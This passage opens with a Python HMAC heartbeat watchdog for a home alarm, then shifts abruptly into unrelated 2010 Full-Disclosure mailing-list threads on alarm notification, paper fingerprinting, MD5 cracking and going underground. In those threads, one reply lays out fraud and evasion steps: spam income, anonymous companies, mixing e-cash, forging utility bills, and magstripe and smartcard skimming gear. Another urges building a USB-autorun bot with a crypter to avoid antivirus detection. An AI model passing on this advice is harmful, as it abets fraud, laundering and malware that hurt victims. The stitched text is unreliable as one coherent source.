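TAG_LEN = hashlib.sha256().digest_size    # 32-byte HMAC-SHA256 tag


def make_heartbeat(key, counter, tripped=False):
    """Home box side: counter and sensor status, authenticated with HMAC."""
    body = BODY.pack(counter, 1 if tripped else 0)
    return body + hmac.new(key, body, hashlib.sha256).digest()


class Watchdog:
    """Remote side: accepts only fresh, authentic heartbeats and notices silence."""

    def __init__(self, key, timeout, now=0.0):
        self.key = key
        self.timeout = timeout
        self.last_counter = 0
        self.last_seen = now

    def receive(self, msg, now):
        if len(msg) != BODY.size + TAG_LEN:
            return "malformed"
        body, tag = msg[:BODY.size], msg[BODY.size:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return "bad-mac"
        counter, status = BODY.unpack(body)
        if counter <= self.last_counter:             # captured message sent again
            return "replay"
        # Only a valid, fresh heartbeat resets the silence timer.
        self.last_counter = counter
        self.last_seen = now
        return "alarm" if status else "ok"

    def silent(self, now):
        """True once no valid heartbeat has arrived for longer than `timeout`."""
        return now - self.last_seen > self.timeout


def run_scenario():
    """Constructed timeline: 30 s heartbeats, link lost after t=60, 90 s timeout."""
    key = b"constructed-demo-key-not-a-real-secret"
    dog = Watchdog(key, timeout=90.0, now=0.0)
    events = []
    captured = None
    for t, counter in ((0.0, 1), (30.0, 2), (60.0, 3)):
        captured = make_heartbeat(key, counter)
        events.append((t, dog.receive(captured, t)))
    # The last genuine heartbeat is sent again after the link went down.
    events.append((100.0, dog.receive(captured, 100.0)))
    # A heartbeat built without the shared key.
    forged = make_heartbeat(b"some-other-key", 4)
    events.append((120.0, dog.receive(forged, 120.0)))
    return {
        "events": events,
        "silent_at_150": dog.silent(150.0),
        "silent_at_151": dog.silent(151.0),
    }


if __name__ == "__main__":
    print(run_scenario())
```

When `silent()` turns true the watchdog should notify over a path that shares nothing with the home site, which is the weakness pointed out in the reply above.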



Re: [Full-disclosure] StreamArmor v1.0 has Released!!!

2010-03-30 Thread T Biehn
HELLO AND THANK YOU FOR YOUR NOTICE I WILL QUICKLY DOWNLOAD THESE
APPLICATIONS AND ERADICATE MY EVIL STREAMS.

On Sun, Mar 28, 2010 at 10:15 PM, evil fingers
 wrote:
> StreamArmor is the sophisticated tool for discovering hidden alternate data
> streams (ADS) as well as clean them completely from the system. Its
> advanced auto analysis coupled with online threat verification mechanism
> makes it the best tool available in the market for eradicating the evil
> streams. StreamArmor comes with fast multi threaded ADS scanner which can
> recursively scan over entire system and quickly uncover all hidden streams.
> All such discovered streams are represented using specific color pattern
> based on threat level which makes it easy for human eye to distinguish
> between suspicious and normal streams.
>
> StreamArmor has built-in advanced file type detection mechanism which
> examines the content of file to accurately detect the file type of stream.
> This makes it great tool in forensic analysis in uncovering hidden
> documents/images/audio/video/database/archive files within the alternate
> data streams. StreamArmor is the standalone, portable application which does
> not require any installation. It can be copied to any place in the system
> and executed directly.
>
> To Read more & to Download the tool, check out : http://www.StreamArmor.com
>
> What others think about SecurityArmor v1.0?
> http://www.security-database.com/toolswatch/StreamArmor-v1-the-advanced.html
>
> Thank you for choosing Rootkit Analytics!
>
> Kind Regards,
> EF
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Security system

2010-03-30 Thread T Biehn
Nah, I'm saying a GSM jammer would block your prepaid cell signal.

So if your adversary were to cut the power, cut the net AND jam GSM
you'd be out of luck in getting notification.

You can get all fancy and have your program try all methods available.
Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.

-Travis

On Tue, Mar 30, 2010 at 10:39 AM,   wrote:
> Good idea u saying also I should by a gsm jammer this a good idea I will
> try.
>
> Sent from my iPhone
>
> On Mar 30, 2010, at 11:30 AM, T Biehn  wrote:
>
>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>
>> Have the text message banged out on the prepaid, rig wires from the
>> breakout board to the cell phone, rig wires from your security sensors
>> into your breakout board. App to listen on com port send a nice high
>> signal to the pin connecting to your send key.
>>
>> Done.
>>
>> Like, 50$ for the phone incld. minutes.
>> Like less than 20$ for a breakout board.
>>
>> Also, rig the ringer up to an input on the breakout board and you can
>> call your phone to clear your FDE keys from RAM and kill your machine
>> if you think the man is paying a visit once you get a text :)
>>
>> Some adversaries will cut net, hardline, sometimes power.
>>
>> Attacks: GSM jammers, which everyone has.
>>
>> -Travis
>>
>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
>>>
>>> Try arduino + internet.
>>>
>>> 2010/3/27 
>>>>
>>>> Anyone got any ideas how I would program a system to call me from a
>>>> voip network to alert me of a home security breach.
>>>>
>>>> Sent from my iPhone
>>>>
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Security system

2010-03-30 Thread T Biehn
Buy a prepaid cell, rig your comp & phone up to a battery backup.
Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.

Have the text message banged out on the prepaid, rig wires from the
breakout board to the cell phone, rig wires from your security sensors
into your breakout board. App to listen on com port send a nice high
signal to the pin connecting to your send key.

Done.

Like, 50$ for the phone incld. minutes.
Like less than 20$ for a breakout board.

Also, rig the ringer up to an input on the breakout board and you can
call your phone to clear your FDE keys from RAM and kill your machine
if you think the man is paying a visit once you get a text :)

Some adversaries will cut net, hardline, sometimes power.

Attacks: GSM jammers, which everyone has.

-Travis

On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
> Try arduino + internet.
>
> 2010/3/27 
>>
>> Anyone got any ideas how I would program a system to call me from a
>> voip network to alert me of a home security breach.
>>
>> Sent from my iPhone
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Administrivia: An Experiment

2010-03-24 Thread T Biehn
This will cause segmentation of the 'moderate trolling list' market.

I am impressed at your trolling prowess John, you're a natural.

-Travis

On Wed, Mar 24, 2010 at 2:17 PM, Paul Schmehl  wrote:
> --On Wednesday, March 24, 2010 15:33:54 + John Cartwright
>  wrote:
>
>> Hi
>>
>> After some deliberation I have decided to try an experiment.  Until
>> further notice, new list members will be subject to temporary
>> moderation.
>>
>
> Cue the obligatory "the world is coming to an end, fd will never be the same,
> this is a violation of the spirit of fd" whining tape..  :-)
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
What 'limits'? What 'acceptable range' are you talking about?
I think they scan the surface doing pit depth / pit counts like an expensive
cd reader.
Within this presumption, you have to fingerprint either the whole document
or a small square. It cannot be duplicated, it cannot be used to
authenticate 'batches.' It could only be included in some piggyback data
e.g. in the smartcard. Preferably signed. With some glorious pki.

Keep trying,

-Travis

On Mar 19, 2010 7:20 PM, "mrx"  wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

valdis.kletni...@vt.edu wrote:

> On Fri, 19 Mar 2010 20:51:40 -, mrx said:
>> Consider a production line for printing anything ...
If deviations in the manufacturing process were consistently between known
limits, it still serves as a control.
A hacker may learn those limits but then the problem of recreating an equal
manufacturing process still remains.
Obviously if the deviation in each sample is such that the known level of
consistency is so wide that the process is easily
replicated then the tech is useless as an indicator of integrity.


> A bigger concern is whether normal wear and tear will invalidate the
> measurements - some spots ...
Yes I would agree, but for tokens of limited lifetime perhaps there is still
potential.
Concert tickets, travel tickets etc.
Besides one could always force renewal of the token once its valid lifetime
has expired.

I still think there may be a potential security benefit here.

mrx


- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
--...

-END PGP SIGNATURE-


Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
X,
The point is that material isn't consistent.

Duh.

-Travis

On Mar 19, 2010 4:58 PM, "mrx"  wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Consider a production line for printing anything that...
sample of the material printed/magnetised or otherwise marked during a
production run, then only one token need be scanned by laser. This

single data set can then be used by access points to verify the validity of
said token(s) when prese...

> So your proposition is that the passport manufacturers all use laser
> beams on each passport they...

- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
---...
-END PGP SIGNATURE-



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
Excellent point.

Travis

On Fri, Mar 19, 2010 at 12:24 PM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 6:42 PM, Fetch, Brandon  wrote:
>> But wait!  That "paper fingerprint" can be captured and added to the RFID 
>> data already saved!
>>
>> *tongue firmly in cheek*
>>
>> No one would be devious enough to duplicate or forge "secured" RFID data in 
>> our passports now would they?
>
> I'm sure The Mossad will try and bypass our technologies.
>
> Andrew
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-18 Thread T Biehn
So your proposition is that the passport manufacturers all use laser
beams on each passport they create and that this whitelist be somehow
distributed to each and every airport and border check-point?

lol.

How bout we just let them get PKI right first.

-Travis

On Thu, Mar 18, 2010 at 12:03 PM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 3:36 PM, T Biehn  wrote:
>> Ridiculous.
>> Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.
>>
>>> The Mossad going to Dubai and assassinating people
>>> in hotel rooms, then I'm all for it.
>>>
>
> They used false British passports, and you wonder why we want to have
> these technologies?
>
> Andrew
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-18 Thread T Biehn
Ridiculous.
Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.

-Travis

On Thu, Mar 18, 2010 at 11:21 AM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 3:17 PM, Gadi Evron  wrote:
>> I saw this release today, and just had to share it with anyone I could find.
>>
>> "Every paper, plastic, metal and ceramic surface is microscopically
>> different and has its own 'fingerprint'. Professor Cowburn's LSA system
>> uses a laser to read this naturally occurring 'fingerprint'. The
>> accuracy of measurement is often greater than that of DNA with a
>> reliability of at least one million trillion."
>>
>> I love it when old technologies and science are used in interesting new
>> ways to impact the future.
>>
>> http://nanotechwire.com/news.asp?nid=2254
>>
>> Expect to see this technology at an airport near you, in five years or so.
>>
>>        Gadi.
>
> As long as it stops The Mossad going to Dubai and assassinating people
> in hotel rooms, then I'm all for it.
>
> Andrew
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] I have been threatened.

2010-03-02 Thread T Biehn
I've heard about these ninjas, the only way to escape their powers is
a ten-strip to your face.

On Tue, Mar 2, 2010 at 11:19 AM, Benji  wrote:
> If Yahoo has ninjas, what does Google have ?! @#!
>
> Sent from my iPhone
> On 2 Mar 2010, at 16:08, James Rankin  wrote:
>
> Mini Ninjas!
>
> On 2 March 2010 16:06,  wrote:
>>
>> On Tue, 02 Mar 2010 09:01:59 EST, "Kain, Becki (B.)" said:
>> >  Yahoo.com has assassins?  Wow!
>>
>> Not just assassins.  Super secret ninja assassins that nobody else can
>> see. ;)
>>
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Going "underground", living out of backpack, etc?

2010-03-01 Thread T Biehn
Simon: What you need is a constant source of income. I suggest you
study TAO Spam (more than just inboxing, mind you.)
You will need an anonymous corporation for fund intake. You will want
a business bank account. You will want to transfer the funds that come
into your account into electronic cash. You will want to mix this cash
about. You will want to lose and create these companies often.

Expect to take a 35% (conservative figure) hit on all profit for
exchange services.

Be sure to know your way around high quality printing and photoshop.
Have a large database of Water & Electric bills. Invest in a
lamination machine. Invest in a magstrip writer & logger, invest in a
smartcard season logger/reader/writer. Learn how to solder. Learn how
to do fast-low cost fabrication.

Acquaint yourself with prepaid visa gift cards and e-cash debit cards.
Acquaint yourself with online (re-)mailing services.
Dispose of all digital equipment you already own and buy new kit with
prepaid visa gift cards or cash.  Perform activations at wifi spots,
don't make the mistake of being in the view of security cameras.
Remove their batteries. Relocate and disappear.

Do not contact friends and family. If you operate online do not use a
constant pseudonym.

-Travis

On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras  wrote:
> Start by not touching any kind of digital device. You wouldn't know how many
> chinese have put tracking/spy bugs inside them. Or how many modified NSA
> backdoors, for the matter.
> Using a PC probably increases risk by 1000%.
>
>
>
>
> On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle  wrote:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Hello.
>>
>> I am interested in getting some advice from you security
>> professionals (white hat and black hat) about going underground.
>>
>> I am sick of big brother, I love independence, I was to experience
>> the world and have no commitments.
>>
>> I am just sick of being held down in one place. It's too easy for
>> people to harass and stalk you.  You gotta be mobile. Fancy free
>> and foot loose.
>>
>> You gotta be underground.
>>
>> Have any advice for living out of a bag? Any stories? Any lessons?
>>
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> -END PGP SIGNATURE-
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Fwd: steathbomb

2010-02-28 Thread T Biehn
Alzo see: USB DMA.

On Fri, Feb 26, 2010 at 8:29 AM, McGhee, Eddie  wrote:
> It's simply using USB autorun to launch and install itself, not sure how much
> it is picked up but tbh you could build one yourself possibly with the 
> features you need, just look into getting some decent bot source and go from 
> there, would save the 130 dollars imo.
>
> Plenty of source code out there to make one of these, in fact, I think I will make
> a guide on it if I get around to it with a stripped down bot, the only thing 
> you really need to worry about is detection, if you have the know how build 
> yourself a decent crypter and make sure no one gets a hold of it to keep 
> detections down.
>
> phed
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
> Sent: 26 February 2010 12:36
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Fwd: steathbomb
>
> anyone see this and know about it? How it works and good detection?
>
> http://www.brickhousesecurity.com/pc-computer-spy.html
>
> --
> been great, thanks
> RandyM
> a.k.a System
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Why

2010-02-22 Thread T Biehn
Kafka's The *Trial. My sincere apologies.

On Mon, Feb 22, 2010 at 12:51 PM, T Biehn  wrote:
> Jonathan,
> There are a few things you can do if the target of a government
> investigation. First and foremost you must acquaint yourself with the
> preeminent guide to the infinite investigative journeys: Kafka's The
> Trail. If you are lacking in literary concentration Orson Welles
> directed a very excellent screenplay version of the novel.
>
> The best recommendation I can afford is to leave the country. If your
> life has been ruined and your friends and family have been badgered
> you have nothing to lose. Your personal and professional lives are
> nil. Restart in a new country.
>
> The second best recommendation is to adopt the 24/7 surveillance as a
> sort of warm big-brother security blanket, intentionally insert
> yourself in dangerous situations, the men who are watching you are
> bound by law to intercede to save your life. Tell people that you're
> being watched, make sure you have proof of surveillance so they don't
> think you're crazy. Let them know that it's a farce, you've done
> nothing wrong. You might find that you can attract certain types of
> women by sharing your unique problem with them, I'd suggest you start
> with the Yoga, new age groups full of bored household wives at your
> local gym.
>
>
> On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras  
> wrote:
>> @Jonny - No, I meant that you should write books. My mistake. Obviously.
>>
>>
>>
>>
>>
>>
>> On Fri, Feb 19, 2010 at 11:26 PM, Benji  wrote:
>>> Where should I send the cheque so that the funds may be released?
>>>
>>> On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham 
>>> wrote:
>>>>
>>>> -BEGIN PGP SIGNED MESSAGE-
>>>> Hash: SHA1
>>>>
>>>> man
>>>>
>>>> someone please help me
>>>>
>>>> On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham
>>>>  wrote:
>>>> >I mean to say, my life is being vivisected. They are pulling my
>>>> >life apart in layers like string cheese.
>>>> >
>>>> >It's quite uncomfortable.
>>>> >
>>>> >On Fri, 19 Feb 2010 21:57:52 + "Thor (Hammer of God)"
>>>> > wrote:
>>>> >>Vivisected like string cheese?
>>>> >>
>>>> >>> -Original Message-
>>>> >>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>>>> >>> disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan
>>>> >>Barningham
>>>> >>> Sent: Friday, February 19, 2010 1:51 PM
>>>> >>> To: full-disclosure@lists.grok.org.uk
>>>> >>> Subject: Re: [Full-disclosure] Why
>>>> >>>
>>>> >>> -BEGIN PGP SIGNED MESSAGE-
>>>> >>> Hash: SHA1
>>>> >>>
>>>> >>> Hello.
>>>> >>>
>>>> >>> I used to be online friends with a subject of an FBI
>>>> >>investigation.
>>>> >>>
>>>> >>> (Not saying who for my safety)
>>>> >>>
>>>> >>> I suppose I could be of assistance in his arrest and
>>>> >>prosecution,
>>>> >>> however, they didn't approach me that way. They approached me
>>>> >>years
>>>> >>> after I changed my life, in a very heavy handed way. Steven
>>>> >>Hatfill
>>>> >>> like, but with local cops. (Clearly, I'm being ambiguous to
>>>> >>protect
>>>> >>> my anonymity)
>>>> >>>
>>>> >>> Add a little ambiguity and locals with hitlists against me from
>>>> >>my
>>>> >>> younger years, That's all it takes. In truth it's not just MIB,
>>>> >>> it's local police back where I used to live.
>>>> >>>
>>>> >>> I'm not going to be arrested obviously, but the constant
>>>> >>bullying,
>>>> >>> harassment, surveillance, pretexts and entrapment attempts is
>>>> >>mind-
>>>> >>> numbing and painful. I'm not some bad guy. I feel so deeply
>>>> >>hurt.
>>>> >>>
>>>> >>> FBI? Stories in specific? A provocateur sent to paint m

Re: [Full-disclosure] Why

2010-02-22 Thread T Biehn
Jonathan,
There are a few things you can do if the target of a government
investigation. First and foremost you must acquaint yourself with the
preeminent guide to the infinite investigative journeys: Kafka's The
Trail. If you are lacking in literary concentration Orson Welles
directed a very excellent screenplay version of the novel.

The best recommendation I can afford is to leave the country. If your
life has been ruined and your friends and family have been badgered
you have nothing to lose. Your personal and professional lives are
nil. Restart in a new country.

The second best recommendation is to adopt the 24/7 surveillance as a
sort of warm big-brother security blanket, intentionally insert
yourself in dangerous situations, the men who are watching you are
bound by law to intercede to save your life. Tell people that you're
being watched, make sure you have proof of surveillance so they don't
think you're crazy. Let them know that it's a farce, you've done
nothing wrong. You might find that you can attract certain types of
women by sharing your unique problem with them, I'd suggest you start
with the Yoga, new age groups full of bored household wives at your
local gym.


On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras  wrote:
> @Jonny - No, I meant that you should write books. My mistake. Obviously.
>
>
>
>
>
>
> On Fri, Feb 19, 2010 at 11:26 PM, Benji  wrote:
>> Where should I send the cheque so that the funds may be released?
>>
>> On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham 
>> wrote:
>>>
>>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>> man
>>>
>>> someone please help me
>>>
>>> On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham
>>>  wrote:
>>> >I mean to say, my life is being vivisected. They are pulling my
>>> >life apart in layers like string cheese.
>>> >
>>> >It's quite uncomfortable.
>>> >
>>> >On Fri, 19 Feb 2010 21:57:52 + "Thor (Hammer of God)"
>>> > wrote:
>>> >>Vivisected like string cheese?
>>> >>
>>> >>> -Original Message-
>>> >>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>>> >>> disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan
>>> >>Barningham
>>> >>> Sent: Friday, February 19, 2010 1:51 PM
>>> >>> To: full-disclosure@lists.grok.org.uk
>>> >>> Subject: Re: [Full-disclosure] Why
>>> >>>
>>> >>> -BEGIN PGP SIGNED MESSAGE-
>>> >>> Hash: SHA1
>>> >>>
>>> >>> Hello.
>>> >>>
>>> >>> I used to be online friends with a subject of an FBI
>>> >>investigation.
>>> >>>
>>> >>> (Not saying who for my safety)
>>> >>>
>>> >>> I suppose I could be of assistance in his arrest and
>>> >>prosecution,
>>> >>> however, they didn't approach me that way. They approached me
>>> >>years
>>> >>> after I changed my life, in a very heavy handed way. Steven
>>> >>Hatfill
>>> >>> like, but with local cops. (Clearly, I'm being ambiguous to
>>> >>protect
>>> >>> my anonymity)
>>> >>>
>>> >>> Add a little ambiguity and locals with hitlists against me from
>>> >>my
>>> >>> younger years, That's all it takes. In truth it's not just MIB,
>>> >>> it's local police back where I used to live.
>>> >>>
>>> >>> I'm not going to be arrested obviously, but the constant
>>> >>bullying,
>>> >>> harassment, surveillance, pretexts and entrapment attempts is
>>> >>mind-
>>> >>> numbing and painful. I'm not some bad guy. I feel so deeply
>>> >>hurt.
>>> >>>
>>> >>> FBI? Stories in specific? A provocateur sent to paint me like a
>>> >>> cyberterrorist.
>>> >>>
>>> >>> My life being vivisected like string cheese. My humble,
>>> >peaceful
>>> >>> lifestyle being sensationalised and scrutinized by ignorant
>>> >Jack
>>> >>> Baeur's and inept bureaucrats.
>>> >>>
>>> >>> My friends are terrified, it's like they have a knife to their
>>> >>> throat -- that is the one's that stook up for me and got
>>> >>> threatened. The more gullible one's comply like the milgrim
>>> >>> experiment and give oscar winning performances. Never knew my
>>> >>> innocuous life could be spun to make me look like a mobster.
>>> >>>
>>> >>> I just want to be left alone. I can't even make friends or
>>> >>> girlfriends because cops will just go to them and take them
>>> >from
>>> >>> me. I am an amicable man and I can't be free without them
>>> >>> threatening the one's I love and turning htem against me. I
>>> >feel
>>> >>so
>>> >>> hopeless
>>> >>>
>>> >>> I'm unsure if they can even articulate a legal reason to
>>> >justify
>>> >>> such harassment. But that's the power of a runaway fishing
>>> >>> expedition.
>>> >>>
>>> >>> I wish I could just sue those bastards. @#$!
>>> >>>
>>> >>> Appreciate your concern
>>> >>>
>>> >>> P.S. Any of you whitehats have an idea what I can do here?
>>> >>>
>>> >>> On Tue, 16 Feb 2010 15:43:46 + ja...@smithwaysecurity.com
>>> >>wrote:
>>> >>> >Hello,
>>> >>> >
>>> >>> >
>>> >>> >So why are the Feds or and homeland security up your ass so
>>> >>much.
>>> >>> >
>>> >>> >What is it you know they want you to keep quite about.
>>> >>> >
>>> >>> 

Re: [Full-disclosure] about jit and dep+aslr

2010-02-05 Thread T Biehn
Every client will render your internationalized version! Transparently!

On Fri, Feb 5, 2010 at 6:56 AM, Larry Seltzer  wrote:
> Full-Disclosure has been submitted to ISO as a discussion standard, requiring 
> English posting, but allowing for a subposting field with referrals to 
> internationalized versions
>
> Larry Seltzer
> Contributing Editor, PC Magazine
> larry_selt...@ziffdavis.com
> http://blogs.pcmag.com/securitywatch/
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Security
> Sent: Friday, February 05, 2010 6:33 AM
> To: full-disclosure@lists.grok.org.uk
> Cc: yuange1...@hotmail.com
> Subject: Re: [Full-disclosure] about jit and dep+aslr
>
> That looked like perfect English to me - even if it is not your native 
> language  (and btw : neither is mine...)
>
>
>
>
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of yuange
> Sent: vrijdag 5 februari 2010 11:59
> To: ravi.borgaon...@gmail.com; full-disclosure
> Subject: Re: [Full-disclosure] about jit and dep+aslr
>
> My native language is not English, if  Full-disclosure rejected the 
> non-English connection, I can opt out!
>
> 
> Date: Fri, 5 Feb 2010 10:28:46 +0100
> Subject: Re: [Full-disclosure] about jit and dep+aslr
> From: ravi.borgaon...@gmail.com
> To: yuange1...@hotmail.com
>
> dude,
>
> dont you know that we speak english on Full-Disclosure list.
>
> R
> 2010/2/5 yuange 
>
>  http://hi.baidu.com/yuange1975/blog/item/4e57c3c2474a183ee5dd3b58.html
> 



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da


Re: [Full-disclosure] anybody know good service for cracking md5?

2010-02-04 Thread T Biehn
Rainbowcrack-Online was doing precomp dictionary attacks in conjunction
with rainbowtables in 2k5.
The hype spike for RC tables was back in 2k4.

You're off by 5 years Christian.

-Travis

On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie  wrote:
> Are you serious? People have been using rainbow tables for years mate.. and
> they are rather widely used.. no need to replace useful with anything, the
> statement was plain wrong..
> 
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
> Sciberras
> Sent: 04 February 2010 12:06
> To: Anders Klixbull
> Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>
> FINE. Replace "useful" with "widely popular".
>
>
>
>
> On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull  wrote:
>>
>> lol they have been useful for years son
>> just because YOU never found a use for them doesn't mean noone else has :)
>>
>>
>> 
>> From: Christian Sciberras [mailto:uuf6...@gmail.com]
>> Sent: 4. februar 2010 13:00
>> To: Anders Klixbull
>> Cc: valdis.kletni...@vt.edu; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>>
>> Uh, in the sense that they are finally becoming actually useful...
>>
>>
>>
>>
>>
>> On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull  wrote:
>>>
>>> seems to be cropping in?
>>> as far as know rainbow tables has been around for years...
>>>
>>>
>>> 
>>> From: full-disclosure-boun...@lists.grok.org.uk
>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
>>> Sciberras
>>> Sent: 3. februar 2010 23:02
>>> To: valdis.kletni...@vt.edu
>>> Cc: full-disclosure@lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] anybody know good service for cracking
>>> md5?
>>>
>>> Actually dictionary attacks seem to work quite well, especially for
>>> common users which typically use dictionary and/or well known passwords
>>> (such as the infamous "password").
>>> Another idea which seems to be cropping in, is the use of hash tables
>>> with a list of known passwords rather than dictionary approach.
>>> Personally, the hash table one is quite successful, consider that it
>>> targets password groups rather than a load of wild guesses.
>>>
>>> Cheers.
>>>
>>>
>>>
>>>
>>> On Wed, Feb 3, 2010 at 10:26 PM,  wrote:

>>>> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:
>>>>
>>>> > i find some sites which says that they can brute md5 hashes and WPA
>>>> > dumps for 1 or 2 days.
>>>>
>>>> Given enough hardware and a specified md5 hash, one could at least
>>>> hypothetically find an input text that generated that hash.  However, that
>>>> may or may not be as useful as one thinks, as you wouldn't have control over
>>>> what the text actually *was*.  It would suck if you were trying to crack
>>>> a password, and got the one that was only 14 binary bytes long rather than
>>>> the one that was 45 printable characters long. ;)
>>>>
>>>> Having said that, it would take one heck of a botnet to brute-force an MD5 hash
>>>> in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would
>>>> take on the order of 10**22 years.  If all 140 million zombied computers on the
>>>> internet were trying 1 billion keys per second, that drops it down to 10**16
>>>> years or so - or about 10,000 times the universe has been around already.
>>>>
>>>> I suspect they're actually doing a dictionary attack, which has a good chance
>>>> of succeeding in a day or two.
>>>
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
Bipin.
I am familiar with LUKS (DMCRYPT), SecurStar's DCPP, TrueCrypt, PGP
